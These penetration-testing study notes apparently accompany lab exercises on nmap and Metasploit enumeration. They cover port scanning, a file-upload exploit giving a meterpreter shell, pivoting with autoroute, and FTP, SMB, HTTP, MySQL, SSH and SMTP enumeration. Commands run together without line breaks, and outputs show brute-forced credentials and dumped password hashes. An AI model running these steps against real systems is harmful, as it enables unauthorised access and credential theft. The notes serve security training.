Information Gathering & Enumeration

Nmap Enumeration

nmap enumeration results (service versions, operating systems, etc) can be exported into a file that can be imported into MSF and used for further detection and exploitation.

🔬 Check the full nmap information gathering lab in this Nmap Host Discovery Lab (at the end of the page).

Some commands:nmap <TARGET_IP>nmap -Pn <TARGET_IP>nmap -Pn -sV -O <TARGET_IP>

  • Output the nmap scan results into an .XML format file that can be imported into MSF

nmap -Pn -sV -O 10.2.18.161 -oX windows_server_2012

  • In the same lab environment from above, use msfconsole to import the results into MSF with the db_import command

service postgresql startmsfconsole

  • Inside msfconsole

db_statusworkspace -a Win2k12db_import /root/windows_server_2012[*] Importing 'Nmap XML' data[*] Import: Parsing with 'Nokogiri v1.10.7'[*] Importing host 10.2.18.161[*] Successfully imported /root/windows_server_2012hostsservicesvulnslootcredsnotes

  • Perform an nmap scan within the MSF Console and import the results in a dedicated workspace

workspace -a nmap_MSFdb_nmap -Pn -sV -O <TARGET_IP>

MSF Auxiliary modules are used during the information gathering (similar to nmap) and the post exploitation phases of the pentest.

  • perform TCP/UDP port scanning

  • enumerate services

  • discover hosts on different network subnets (post-exploitation phase)

Lab Network Service Scanning

🔬 Lab T1046 : Network Service Scanning

service postgresql start && msfconsole -qworkspace -a Port_scansearch portscanuse auxiliary/scanner/portscan/tcpset RHOSTS 192.41.167.3runcurl 192.41.167.3

  • Exploitation

search xodause exploit/unix/webapp/xoda_file_uploadset RHOSTS 192.41.167.3set TARGETURI /run

  • Perform a network scan on the second target

meterpreter > shell/bin/bash -iifconfig# 192.26.158.2 Local Lan subnet IPexit

  • Add the route within meterpreter and background the meterpreter session

run autoroute -s 192.26.158.2backgroundsearch portscanuse auxiliary/scanner/portscan/tcpset RHOSTS 192.26.158.3run# the port scan will be performed through the first target system using the route[+] 192.26.158.3: - 192.26.158.3:22 - TCP OPEN[+] 192.26.158.3: - 192.26.158.3:21 - TCP OPEN[+] 192.26.158.3: - 192.26.158.3:80 - TCP OPEN

  • Upload and run nmap against the second target, from the first target machine

sessions 1upload /root/tools/static-binaries/nmap /tmp/nmapshell/bin/bash -icd /tmpchmod +x ./nmap./nmap -p- 192.26.158.321/tcp open ftp22/tcp open ssh80/tcp open http

📌 There are 3 running services on the second target machine.

UDP Scan

  • Into msfconsole

search udp_sweepuse auxiliary/scanner/discovery/udp_sweepset RHOSTS 192.41.167.3run

📌🔬 Check the Enumeration Section labs here for basic nmap enumeration.

Next, there are some MSF commands and modules for service enumeration on the same labs from the Enumeration Section.

  • Auxiliary modules can be used for enumeration, brute-force attacks, etc

❗📝 On every attacker machine, run this command to start msfconsole:service postgresql start && msfconsole -q

  • Setup a global variable. This will set the RHOSTS option for all the modules utilized:

setg RHOSTS <TARGET_IP>

FTP

auxiliary/scanner/ftp/ftp_version

ip -br -c aworkspace -a FTP_ENUMsearch portscanuse auxiliary/scanner/portscan/tcpset RHOSTS 192.146.175.3run[+] 192.146.175.3: - 192.146.175.3:21 - TCP OPENbacksearch type:auxiliary name:ftpuse auxiliary/scanner/ftp/ftp_versionset RHOSTS 192.146.175.3run[+] 192.146.175.3:21 - FTP Banner: '220 ProFTPD 1.3.5a Server (AttackDefense-FTP) [::ffff:192.146.175.3]\x0d\x0a'​search ProFTPD

auxiliary/scanner/ftp/ftp_login

backsearch type:auxiliary name:ftpuse auxiliary/scanner/ftp/ftp_loginshow optionsset RHOSTS 192.146.175.3set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txtset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtrun[+] 192.146.175.3:21 - 192.146.175.3:21 - Login Successful: sysadmin:654321

auxiliary/scanner/ftp/anonymous

backsearch type:auxiliary name:ftpuse auxiliary/scanner/ftp/anonymousset RHOSTS 192.146.175.3run

SMB/SAMBA

auxiliary/scanner/smb/smb_version

ip -br -c asetg RHOSTS 192.132.155.3workspace -a SMB_ENUMsearch type:auxiliary name:smbuse auxiliary/scanner/smb/smb_versionoptionsrun[*] 192.132.155.3:445 - Host could not be identified: Windows 6.1 (Samba 4.3.11-Ubuntu)

auxiliary/scanner/smb/smb_enumusers

backsearch type:auxiliary name:smbuse auxiliary/scanner/smb/smb_enumusersinforun[+] 192.132.155.3:139 - SAMBA-RECON [ john, elie, aisha, shawn, emma, admin ] ( LockoutTries=0 PasswordMin=5 )

auxiliary/scanner/smb/smb_enumshares

backsearch type:auxiliary name:smbuse auxiliary/scanner/smb/smb_enumsharesset ShowFiles truerun[+] 192.132.155.3:139 - public - (DS)[+] 192.132.155.3:139 - john - (DS)[+] 192.132.155.3:139 - aisha - (DS)[+] 192.132.155.3:139 - emma - (DS)[+] 192.132.155.3:139 - everyone - (DS)[+] 192.132.155.3:139 - IPC$ - (I) IPC Service (samba.recon.lab)

auxiliary/scanner/smb/smb_login

backsearch smb_loginuse auxiliary/scanner/smb/smb_loginoptionsset SMBUser adminset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtrun[+] 192.132.155.3:445 - 192.132.155.3:445 - Success: '.\admin:password'

HTTP

🔬 Metasploit - Apache Enumeration Lab

  • Remember to specify the correct port and if targeting a web server with SSL enabled, in the options.

ip -br -c asetg RHOSTS 192.106.226.3setg RHOST 192.106.226.3workspace -a HTTP_ENUM

auxiliary/scanner/http/apache_userdir_enum

search apache_userdir_enumuse auxiliary/scanner/http/apache_userdir_enumoptionsinfoset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txtrun[+] http://192.106.226.3/ - Users found: rooty

auxiliary/scanner/http/brute_dirs

auxiliary/scanner/http/dir_scanner

search dir_scanneruse auxiliary/scanner/http/dir_scanneroptionsrun

auxiliary/scanner/http/dir_listing

auxiliary/scanner/http/http_put

[+] Found http://192.106.226.3:80/cgi-bin/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/data/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/doc/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/downloads/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/icons/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/manual/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/secure/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/users/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/uploads/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/web_app/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/view/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/webadmin/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/webmail/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/webdb/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/webdav/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/~admin/ 404 (192.106.226.3)[+] Found http://192.106.226.3:80/~nobody/ 404 (192.106.226.3)

auxiliary/scanner/http/files_dir

search files_diruse auxiliary/scanner/http/files_diroptionsset DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_files.txtrun[+] Found http://192.106.226.3:80/file.backup 200[*] Using code '404' as not found for files with extension .bak[*] Using code '404' as not found for files with extension .c[+] Found http://192.106.226.3:80/code.c 200[*] Using code '404' as not found for files with extension .cfg[+] Found http://192.106.226.3:80/code.cfg 200[*] Using code '404' as not found for files with extension .class[...][*] Using code '404' as not found for files with extension .html[+] Found http://192.106.226.3:80/index.html 200[*] Using code '404' as not found for files with extension .htm[...][+] Found http://192.106.226.3:80/test.php 200[*] Using code '404' as not found for files with extension .tar[...]

auxiliary/scanner/http/http_login

search http_loginuse auxiliary/scanner/http/http_loginoptionsset AUTH_URI /secure/unset USERPASS_FILEecho "rooty" > user.txtset USER_FILE /root/user.txtset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtset VERBOSE falserun

auxiliary/scanner/http/http_header

search http_headeruse auxiliary/scanner/http/http_headeroptionsrun[+] 192.106.226.3:80 : CONTENT-TYPE: text/html[+] 192.106.226.3:80 : LAST-MODIFIED: Wed, 27 Feb 2019 04:21:01 GMT[+] 192.106.226.3:80 : SERVER: Apache/2.4.18 (Ubuntu)[+] 192.106.226.3:80 : detected 3 headers

auxiliary/scanner/http/http_version

search type:auxiliary name:httpuse auxiliary/scanner/http/http_versionoptionsrun# in case of HTTPS website, set RPORT=443 and SSL="true"[+] 192.106.226.3:80 Apache/2.4.18 (Ubuntu)

auxiliary/scanner/http/robots_txt

search robots_txtuse auxiliary/scanner/http/robots_txtoptionsrun[+] Contents of Robots.txt:# robots.txt for attackdefenseUser-agent: test# DirectoriesAllow: /webmailUser-agent: *# DirectoriesDisallow: /dataDisallow: /securecurl http://192.106.226.3/data/curl http://192.106.226.3/secure/

MYSQL

🔬 Metasploit - MySQL Enumeration Lab

ip -br -c asetg RHOSTS 192.64.22.3setg RHOST 192.64.22.3workspace -a MYSQL_ENUM

auxiliary/admin/mysql/mysql_enum

search mysql_enumuse auxiliary/admin/mysql/mysql_enuminfoset USERNAME rootset PASSWORD twinklerun[*] 192.64.22.3:3306 - Running MySQL Enumerator...[*] 192.64.22.3:3306 - Enumerating Parameters[*] 192.64.22.3:3306 - MySQL Version: 5.5.61-0ubuntu0.14.04.1[*] 192.64.22.3:3306 - Compiled for the following OS: debian-linux-gnu[*] 192.64.22.3:3306 - Architecture: x86_64[*] 192.64.22.3:3306 - Server Hostname: victim-1[*] 192.64.22.3:3306 - Data Directory: /var/lib/mysql/[*] 192.64.22.3:3306 - Logging of queries and logins: OFF[*] 192.64.22.3:3306 - Old Password Hashing Algorithm OFF[*] 192.64.22.3:3306 - Loading of local files: ON[*] 192.64.22.3:3306 - Deny logins with old Pre-4.1 Passwords: OFF[*] 192.64.22.3:3306 - Allow Use of symlinks for Database Files: YES[*] 192.64.22.3:3306 - Allow Table Merge:[*] 192.64.22.3:3306 - SSL Connection: DISABLED[*] 192.64.22.3:3306 - Enumerating Accounts:[*] 192.64.22.3:3306 - List of Accounts with Password Hashes:[+] 192.64.22.3:3306 - User: root Host: localhost Password Hash: *A0E23B565BACCE3E70D223915ABF2554B2540144[+] 192.64.22.3:3306 - User: root Host: 891b50fafb0f Password Hash:[+] 192.64.22.3:3306 - User: root Host: 127.0.0.1 Password Hash:[+] 192.64.22.3:3306 - User: root Host: ::1 Password Hash:[+] 192.64.22.3:3306 - User: debian-sys-maint Host: localhost Password Hash: *F4E71A0BE028B3688230B992EEAC70BC598FA723[+] 192.64.22.3:3306 - User: root Host: % Password Hash: *A0E23B565BACCE3E70D223915ABF2554B2540144[+] 192.64.22.3:3306 - User: filetest Host: % Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B[+] 192.64.22.3:3306 - User: ultra Host: localhost Password Hash: *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29[+] 192.64.22.3:3306 - User: guest Host: localhost Password Hash: *17FD2DDCC01E0E66405FB1BA16F033188D18F646[+] 192.64.22.3:3306 - User: gopher Host: localhost Password Hash: *027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0[+] 192.64.22.3:3306 - User: backup Host: localhost Password Hash: *E6DEAD2645D88071D28F004A209691AC60A72AC9[+] 192.64.22.3:3306 - User: sysadmin Host: localhost Password Hash: *78A1258090DAA81738418E11B73EB494596DFDD3[*] 192.64.22.3:3306 - The following users have GRANT Privilege:[...]

auxiliary/admin/mysql/mysql_sql

search mysql_sqluse auxiliary/admin/mysql/mysql_sqloptionsset USERNAME rootset PASSWORD twinklerun# set an SQL queryset SQL show databases;run[*] 192.64.22.3:3306 - Sending statement: 'select version()'...[*] 192.64.22.3:3306 - | 5.5.61-0ubuntu0.14.04.1 |​[*] 192.64.22.3:3306 - Sending statement: 'show databases;'...[*] 192.64.22.3:3306 - | information_schema |[*] 192.64.22.3:3306 - | mysql |[*] 192.64.22.3:3306 - | performance_schema |[*] 192.64.22.3:3306 - | upload |[*] 192.64.22.3:3306 - | vendors |[*] 192.64.22.3:3306 - | videos |[*] 192.64.22.3:3306 - | warehouse |

auxiliary/scanner/mysql/mysql_file_enum

auxiliary/scanner/mysql/mysql_hashdump

auxiliary/scanner/mysql/mysql_login

search mysql_loginuse auxiliary/scanner/mysql/mysql_loginoptionsset USERNAME rootset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtset VERBOSE falseset STOP_ON_SUCCESS falserun[+] 192.64.22.3:3306 - 192.64.22.3:3306 - Success: 'root:twinkle'

auxiliary/scanner/mysql/mysql_schemadump

search mysql_schemadumpuse auxiliary/scanner/mysql/mysql_schemadumpoptionsset USERNAME rootset PASSWORD twinklerun[+] 192.64.22.3:3306 - Schema stored in:/root/.msf4/loot/20230413112948_MYSQL_ENUM_192.64.22.3_mysql_schema_807923.txt[+] 192.64.22.3:3306 - MySQL Server SchemaHost: 192.64.22.3Port: 3306====================---- DBName: uploadTables: []- DBName: vendorsTables: []- DBName: videosTables: []- DBName: warehouseTables: []

auxiliary/scanner/mysql/mysql_version

search type:auxiliary name:mysqluse auxiliary/scanner/mysql/mysql_versionoptionsrun[+] 192.64.22.3:3306 - 192.64.22.3:3306 is running MySQL 5.5.61-0ubuntu0.14.04.1 (protocol 10)# MySQL and Ubuntu versions enumerated!

auxiliary/scanner/mysql/mysql_writable_dirs

  • Check the MySQL Enumerated data within MSF:

hostsserviceslootcreds

SSH

🔬 Metasploit - SSH Login

ip -br -c asetg RHOSTS 192.127.196.3setg RHOST 192.127.196.3workspace -a SSH_ENUM

auxiliary/scanner/ssh/ssh_version

search type:auxiliary name:sshuse auxiliary/scanner/ssh/ssh_versionoptionsrun[+] 192.127.196.3:22 - SSH server version: SSH-2.0-OpenSSH_7.9p1 Ubuntu-10 ( service.version=7.9p1 openssh.comment=Ubuntu-10 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.9p1 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=19.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:19.04 service.protocol=ssh fingerprint_db=ssh.banner )# SSH-2.0-OpenSSH_7.9p1 and Ubuntu 19.04

auxiliary/scanner/ssh/ssh_login

search ssh_loginuse auxiliary/scanner/ssh/ssh_login# for password authenticationoptionsset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txtset PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txtrun[+] 192.127.196.3:22 - Success: 'sysadmin:hailey' ''[*] Command shell session 1 opened (192.127.196.2:37093 -> 192.127.196.3:22)[+] 192.127.196.3:22 - Success: 'rooty:pineapple' ''[*] Command shell session 2 opened (192.127.196.2:44935 -> 192.127.196.3:22)[+] 192.127.196.3:22 - Success: 'demo:butterfly1' ''[*] Command shell session 3 opened (192.127.196.2:39681 -> 192.127.196.3:22)[+] 192.127.196.3:22 - Success: 'auditor:xbox360' ''[*] Command shell session 4 opened (192.127.196.2:42273 -> 192.127.196.3:22)[+] 192.127.196.3:22 - Success: 'anon:741852963' ''[*] Command shell session 5 opened (192.127.196.2:44263 -> 192.127.196.3:22)[+] 192.127.196.3:22 - Success: 'administrator:password1' ''[*] Command shell session 6 opened (192.127.196.2:39997 -> 192.127.196.3:22)[+] 192.127.196.3:22 - Success: 'diag:secret' ''

  • This module sets up SSH sessions

auxiliary/scanner/ssh/ssh_enumusers

search type:auxiliary name:sshuse auxiliary/scanner/ssh/ssh_enumusersoptionsset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txtrun[+] 192.127.196.3:22 - SSH - User 'sysadmin' found[+] 192.127.196.3:22 - SSH - User 'rooty' found[+] 192.127.196.3:22 - SSH - User 'demo' found[+] 192.127.196.3:22 - SSH - User 'auditor' found[+] 192.127.196.3:22 - SSH - User 'anon' found[+] 192.127.196.3:22 - SSH - User 'administrator' found[+] 192.127.196.3:22 - SSH - User 'diag' found

SMTP

🔬 SMTP - Postfix Recon: Basics

ip -br -c asetg RHOSTS 192.8.115.3setg RHOST 192.8.115.3workspace -a SMTP_ENUM# Run a portscan to identify SMTP port, in this case is port 25

auxiliary/scanner/smtp/smtp_enum

search type:auxiliary name:smtpuse auxiliary/scanner/smtp/smtp_enumoptionsrun[+] 192.63.243.3:25 - 192.63.243.3:25 Users found: , admin, administrator, backup, bin, daemon, games, gnats, irc, list, lp, mail, man, news, nobody, postmaster, proxy, sync, sys, uucp, www-data

auxiliary/scanner/smtp/smtp_version

search type:auxiliary name:smtpuse auxiliary/scanner/smtp/smtp_versionoptionsrun[+] 192.8.115.3:25 - 192.8.115.3:25 SMTP 220 openmailbox.xyz ESMTP Postfix: Welcome to our mail server.\x0d\x0a